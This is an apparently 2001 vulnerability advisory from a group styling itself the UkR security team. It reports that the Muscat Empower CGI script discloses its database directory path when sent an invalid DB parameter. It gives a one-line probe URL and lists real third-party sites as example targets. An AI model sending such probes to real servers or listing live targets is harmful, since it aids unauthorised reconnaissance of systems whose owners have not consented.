-----------UkR security team advisory #6------------ Vulnerability in Muscat Empower wich can print path to DB-dir. -------------------------------------------------- Name: Vulnerability in Muscat Empower wich can print path to DB-dir. Date: 03.02.2001 Problem: when the request invalid send to database script print path to it. Author: UkR-XblP Exploit: http://www.example.com/cgi-bin/empower?DB=UkRteamHole Example: http://www.nokia.com/cgi-bin/empower?DB=UkRteamHole http://www.hmso.gov.uk/cgi-bin/empower?DB=UkRteamHole Get your free e-mail address at http://www.zmail.ru